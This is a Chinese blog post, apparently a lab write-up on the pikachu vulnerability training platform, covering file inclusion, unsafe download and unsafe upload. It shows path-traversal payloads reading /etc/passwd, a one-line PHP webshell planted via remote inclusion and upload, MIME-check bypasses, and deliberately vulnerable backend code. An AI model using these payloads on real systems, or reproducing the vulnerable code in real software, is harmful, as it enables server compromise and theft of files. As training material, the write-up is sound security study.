<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web安全,">










<meta name="description" content="文件包含 概述 文件包含，是一个功能。在各种开发语言中都提供了内置的文件包含函数，其可以使开发人员在一个代码文件中直接包含（引入）另外一个代码文件。 比如 在PHP中，提供了： include(),include_once() require(),require_once() 这些文件包含函数，这些函数在代码设计中被经常使用到。  大多数情况下，文件包含函数中包含的代码文件是固定的，因此也不会出现">
<meta name="keywords" content="web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu漏洞平台学习（6）">
<meta property="og:url" content="https://srat1999.top/2019/07/24/pikachu漏洞平台学习（6）/index.html">
<meta property="og:site_name" content="Stay hungry stay foolish">
<meta property="og:description" content="文件包含 概述 文件包含，是一个功能。在各种开发语言中都提供了内置的文件包含函数，其可以使开发人员在一个代码文件中直接包含（引入）另外一个代码文件。 比如 在PHP中，提供了： include(),include_once() require(),require_once() 这些文件包含函数，这些函数在代码设计中被经常使用到。  大多数情况下，文件包含函数中包含的代码文件是固定的，因此也不会出现">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-01-45.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-00-23.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-35-18.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-39-52.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-41-23.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-41-57.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_09-11-05.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_09-25-33.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_11-15-23.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_13-22-29.png">
<meta property="og:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_15-41-06.png">
<meta property="og:updated_time" content="2019-11-30T04:25:50.592Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pikachu漏洞平台学习（6）">
<meta name="twitter:description" content="文件包含 概述 文件包含，是一个功能。在各种开发语言中都提供了内置的文件包含函数，其可以使开发人员在一个代码文件中直接包含（引入）另外一个代码文件。 比如 在PHP中，提供了： include(),include_once() require(),require_once() 这些文件包含函数，这些函数在代码设计中被经常使用到。  大多数情况下，文件包含函数中包含的代码文件是固定的，因此也不会出现">
<meta name="twitter:image" content="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-01-45.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://srat1999.top/2019/07/24/pikachu漏洞平台学习（6）/">





  <title>pikachu漏洞平台学习（6） | Stay hungry stay foolish</title>
  








<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Stay hungry stay foolish</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">srat1999's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://srat1999.top/2019/07/24/pikachu漏洞平台学习（6）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="srat1999">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/uploads/pikachu.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Stay hungry stay foolish">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pikachu漏洞平台学习（6）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-24T15:53:04+08:00">
                2019-07-24
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/靶场/" itemprop="url" rel="index">
                    <span itemprop="name">靶场</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3.7k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  15
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h1><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>文件包含，是一个功能。在各种开发语言中都提供了内置的文件包含函数，其可以使开发人员在一个代码文件中直接包含（引入）另外一个代码文件。 比如 在PHP中，提供了：<br>include(),include_once()<br>require(),require_once()<br>这些文件包含函数，这些函数在代码设计中被经常使用到。</p>
<p>大多数情况下，文件包含函数中包含的代码文件是固定的，因此也不会出现安全问题。 但是，有些时候，文件包含的代码文件被写成了一个变量，且这个变量可以由前端用户传进来，这种情况下，如果没有做足够的安全考虑，则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行，从而造成恶意操作。 根据不同的配置环境，文件包含漏洞分为如下两种情况：<br><strong>1.本地文件包含漏洞：</strong>仅能够对服务器本地的文件进行包含，由于服务器上的文件并不是攻击者所能够控制的，因此该情况下，攻击着更多的会包含一些 固定的系统配置文件，从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞，从而形成更大的威力。<br><strong>2.远程文件包含漏洞：</strong>能够通过url地址对远程的文件进行包含，这意味着攻击者可以传入任意的代码，这种情况没啥好说的，准备挂彩。</p>
<p>因此，在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数，如果非要这么做，也一定要做严格的白名单策略进行过滤。</p>
<p>你可以通过“File Inclusion”对应的测试栏目，来进一步的了解该漏洞。</p>
</blockquote>
<h3 id="0x01-本地文件包含"><a href="#0x01-本地文件包含" class="headerlink" title="0x01 本地文件包含"></a>0x01 本地文件包含</h3><p>观察url</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-01-45.png" alt></p>
<p>构造payload：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-00-23.png" alt></p>
<p>观察后台逻辑：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$html=<span class="string">''</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'submit'</span>]) &amp;&amp; $_GET[<span class="string">'filename'</span>]!=<span class="keyword">null</span>)&#123;</span><br><span class="line">    $filename=$_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span> <span class="string">"include/$filename"</span>;<span class="comment">//变量传进来直接包含,没做任何的安全限制</span></span><br><span class="line"><span class="comment">//     //安全的写法,使用白名单，严格指定包含的文件名</span></span><br><span class="line"><span class="comment">//     if($filename=='file1.php' || $filename=='file2.php' || $filename=='file3.php' || $filename=='file4.php' || $filename=='file5.php')&#123;</span></span><br><span class="line"><span class="comment">//         include "include/$filename";</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//     &#125;</span></span><br></pre></td></tr></table></figure>
<p>后台直接将变量filename拼接在include后，没有做任何过滤，因此我们输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>
<p>相当于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">include &quot;include/../../../../../../../etc/passwd&quot;</span><br></pre></td></tr></table></figure>
<p>由于当跳转到根目录后在跳转到上层目录依旧是在根目录。我们可以借此来定位到/etc/passwd。但需要注意这里无法远程文件包含。防御方案已经给出，使用白名单。</p>
<h3 id="0x02-远程文件包含"><a href="#0x02-远程文件包含" class="headerlink" title="0x02 远程文件包含"></a>0x02 远程文件包含</h3><p>在自己主机写即将需要包含的php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$myfile = fopen(<span class="string">"config.php"</span>,<span class="string">"w"</span>);</span><br><span class="line">$txt = <span class="string">'&lt;?php system($_GET[x]);?&gt;'</span>;</span><br><span class="line">fwrite($myfile,$txt);</span><br><span class="line">fclose($myfile);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>在url包含该文件：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-35-18.png" alt></p>
<p>之后跳转到之前页面。</p>
<p>此时已经将一句话写到fileinclude文件夹。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-39-52.png" alt></p>
<p>在url引用执行:</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-41-23.png" alt></p>
<p>结果：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-24_16-41-57.png" alt></p>
<p>(有乱码，不纠结)</p>
<p>看后台逻辑：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$html=<span class="string">''</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'submit'</span>]) &amp;&amp; $_GET[<span class="string">'filename'</span>]!=<span class="keyword">null</span>)&#123;</span><br><span class="line">    $filename=$_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span> <span class="string">"$filename"</span>;<span class="comment">//变量传进来直接包含,没做任何的安全限制</span></span><br></pre></td></tr></table></figure>
<p>这里其实比本地文件包含条件更严格（代码写得更垃圾），而且需要开启php的allow_url_include设置。原理和本地文件包含类似，只是可以远程执行我们的php代码，这就很恐怖了。当然了，条件越苛刻，其危害程度也相对较大。</p>
<h1 id="不安全的文件下载"><a href="#不安全的文件下载" class="headerlink" title="不安全的文件下载"></a>不安全的文件下载</h1><h3 id="概述-1"><a href="#概述-1" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>文件下载功能在很多web系统上都会出现，一般我们当点击下载链接，便会向后台发送一个下载请求，一般这个请求会包含一个需要下载的文件名称，后台在收到请求后 会开始执行下载代码，将该文件名对应的文件response给浏览器，从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话，则可能会引发不安全的文件下载漏洞。<br>此时如果 攻击者提交的不是一个程序预期的的文件名，而是一个精心构造的路径(比如../../../etc/passwd),则很有可能会直接将该指定的文件下载下来。 从而导致后台敏感信息(密码文件、源代码等)被下载。</p>
<p>所以，在设计文件下载功能时，如果下载的目标文件是由前端传进来的，则一定要对传进来的文件进行安全考虑。 切记：所有与前端交互的数据都是不安全的，不能掉以轻心！</p>
<p>你可以通过“Unsafe file download”对应的测试栏目，来进一步的了解该漏洞。</p>
</blockquote>
<h3 id="0x01-举例"><a href="#0x01-举例" class="headerlink" title="0x01 举例"></a>0x01 举例</h3><p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_09-11-05.png" alt></p>
<p>bp抓包如下：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/vul/unsafedownload/execdownload.php?filename=kb.png</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 127.0.0.1</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Referer</span>: http://127.0.0.1/vul/unsafedownload/down_nba.php</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Cookie</span>: PHPSESSID=ss67teridap0s8anv390o8rgu2</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br></pre></td></tr></table></figure>
<p>可以看到前端用get请求，以filename指定要下载的文件。</p>
<p>那我们偏不要下载这个文件：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_09-25-33.png" alt></p>
<p>发现可以下载。</p>
<p>查看后台下载函数,其实很多都不需要看，只关注这里：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">header(<span class="string">"Content-type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="comment">// $file_name="cookie.jpg";</span></span><br><span class="line">$file_path=<span class="string">"download/&#123;$_GET['filename']&#125;"</span>;</span><br></pre></td></tr></table></figure>
<p>也是直接的拼接，并未进行过滤。</p>
<h1 id="不安全的文件上传"><a href="#不安全的文件上传" class="headerlink" title="不安全的文件上传"></a>不安全的文件上传</h1><h3 id="概述-2"><a href="#概述-2" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>文件上传功能在web应用系统很常见，比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后，后台会对上传的文件进行判断                         </p>
<p>比如是否是指定的类型、后缀名、大小等等，然后将其按照设计的格式进行重命名后存储在指定的目录。                         如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨，则攻击者可能会上传一些恶意的文件，比如一句话木马，从而导致后台服务器被webshell。                     </p>
<p>​                         </p>
<p>所以，在设计文件上传功能时，一定要对传进来的文件进行严格的安全考虑。比如：<br>                         –验证文件类型、后缀名、大小;<br>                         –验证文件的上传方式;<br>                         –对文件进行一定复杂的重命名;<br>                         –不要暴露文件上传后的路径;<br>                         –等等…</p>
<p>你可以通过“Unsafe file upload”对应的测试栏目，来进一步的了解该漏洞</p>
</blockquote>
<h3 id="0x01-client-check"><a href="#0x01-client-check" class="headerlink" title="0x01 client check"></a>0x01 client check</h3><p>这里前端验证文件是否为图片，看代码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">checkFileExt</span>(<span class="params">filename</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> flag = <span class="literal">false</span>; <span class="comment">//状态</span></span><br><span class="line">        <span class="keyword">var</span> arr = [<span class="string">"jpg"</span>,<span class="string">"png"</span>,<span class="string">"gif"</span>];</span><br><span class="line">        <span class="comment">//取出上传文件的扩展名</span></span><br><span class="line">        <span class="keyword">var</span> index = filename.lastIndexOf(<span class="string">"."</span>);</span><br><span class="line">        <span class="keyword">var</span> ext = filename.substr(index+<span class="number">1</span>);</span><br><span class="line">        <span class="comment">//比较</span></span><br><span class="line">        <span class="keyword">for</span>(<span class="keyword">var</span> i=<span class="number">0</span>;i&lt;arr.length;i++)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(ext == arr[i])</span><br><span class="line">            &#123;</span><br><span class="line">                flag = <span class="literal">true</span>; <span class="comment">//一旦找到合适的，立即退出循环</span></span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//条件判断</span></span><br><span class="line">        <span class="keyword">if</span>(!flag)</span><br><span class="line">        &#123;</span><br><span class="line">            alert(<span class="string">"上传的文件不符合要求，请重新选择！"</span>);</span><br><span class="line">            location.reload(<span class="literal">true</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>
<p>因此可以将一句话后缀改为符合的后缀之后bp抓包，该后缀为php即可。（这里用腾讯云为靶机，上传一句话后菜刀死活连不上，所以只能用自写的脚本验证）</p>
<p>脚本如下;</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    system($_GET[<span class="string">'x'</span>])</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>验证：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_11-15-23.png" alt></p>
<h3 id="0x02-MIME-type"><a href="#0x02-MIME-type" class="headerlink" title="0x02 MIME type"></a>0x02 MIME type</h3><p>这里测试一下可以看到我们选择php文件时是可以成功选择的，没有报错。但我们无法上传成功这个php文件。这表明验证文件的函数不再前端，而是在后端，而且一定是有一个参数标定了我们上传文件的类型。</p>
<p>这里了解一些<a href="http://www.w3school.com.cn/media/media_mimeref.asp" target="_blank" rel="noopener">MIME type</a></p>
<p>我们抓包可以看到：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-25_13-22-29.png" alt></p>
<p>content-type参数指定了文件类型。我们这里上传了php文件，所以MIME 类型为 application/octet-stream.</p>
<p>这里一个思路就是上传php文件，bp拦截在将content-type字段改为images/png。</p>
<p>看一下后端代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$html=<span class="string">''</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line"><span class="comment">//     var_dump($_FILES);</span></span><br><span class="line">    $mime=<span class="keyword">array</span>(<span class="string">'image/jpg'</span>,<span class="string">'image/jpeg'</span>,<span class="string">'image/png'</span>);<span class="comment">//指定MIME类型,这里只是对MIME类型做了判断。</span></span><br><span class="line">    $save_path=<span class="string">'uploads'</span>;<span class="comment">//指定在当前目录建立一个目录</span></span><br><span class="line">    $upload=upload_sick(<span class="string">'uploadfile'</span>,$mime,$save_path);<span class="comment">//调用函数</span></span><br><span class="line">    <span class="keyword">if</span>($upload[<span class="string">'return'</span>])&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;p class='notice'&gt;文件上传成功&lt;/p&gt;&lt;p class='notice'&gt;文件保存的路径为：&#123;$upload['new_path']&#125;&lt;/p&gt;"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;p class=notice&gt;&#123;$upload['error']&#125;&lt;/p&gt;"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>调用了upload_sick()函数。</p>
<p>看一下upload_sick函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//只通过MIME类型验证了一下图片类型，其他的无验证,upsafe_upload_check.php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">upload_sick</span><span class="params">($key,$mime,$save_path)</span></span>&#123;</span><br><span class="line">    $arr_errors=<span class="keyword">array</span>(</span><br><span class="line">        <span class="number">1</span>=&gt;<span class="string">'上传的文件超过了 php.ini中 upload_max_filesize 选项限制的值'</span>,</span><br><span class="line">        <span class="number">2</span>=&gt;<span class="string">'上传文件的大小超过了 HTML 表单中 MAX_FILE_SIZE 选项指定的值'</span>,</span><br><span class="line">        <span class="number">3</span>=&gt;<span class="string">'文件只有部分被上传'</span>,</span><br><span class="line">        <span class="number">4</span>=&gt;<span class="string">'没有文件被上传'</span>,</span><br><span class="line">        <span class="number">6</span>=&gt;<span class="string">'找不到临时文件夹'</span>,</span><br><span class="line">        <span class="number">7</span>=&gt;<span class="string">'文件写入失败'</span></span><br><span class="line">    );</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">isset</span>($_FILES[$key][<span class="string">'error'</span>]))&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'请选择上传文件！'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ($_FILES[$key][<span class="string">'error'</span>]!=<span class="number">0</span>) &#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=$arr_errors[$_FILES[$key][<span class="string">'error'</span>]];</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//验证一下MIME类型</span></span><br><span class="line">    <span class="keyword">if</span>(!in_array($_FILES[$key][<span class="string">'type'</span>], $mime))&#123;</span><br><span class="line">        $return_data[<span class="string">'error'</span>]=<span class="string">'上传的图片只能是jpg,jpeg,png格式的！'</span>;</span><br><span class="line">        $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">        <span class="keyword">return</span> $return_data;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//新建一个保存文件的目录</span></span><br><span class="line">    <span class="keyword">if</span>(!file_exists($save_path))&#123;</span><br><span class="line">        <span class="keyword">if</span>(!mkdir($save_path,<span class="number">0777</span>,<span class="keyword">true</span>))&#123;</span><br><span class="line">            $return_data[<span class="string">'error'</span>]=<span class="string">'上传文件保存目录创建失败，请检查权限!'</span>;</span><br><span class="line">            $return_data[<span class="string">'return'</span>]=<span class="keyword">false</span>;</span><br><span class="line">            <span class="keyword">return</span> $return_data;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    $save_path=rtrim($save_path,<span class="string">'/'</span>).<span class="string">'/'</span>;<span class="comment">//给路径加个斜杠</span></span><br><span class="line">    <span class="keyword">if</span>(!move_uploaded_file($_FILES[$key][<span 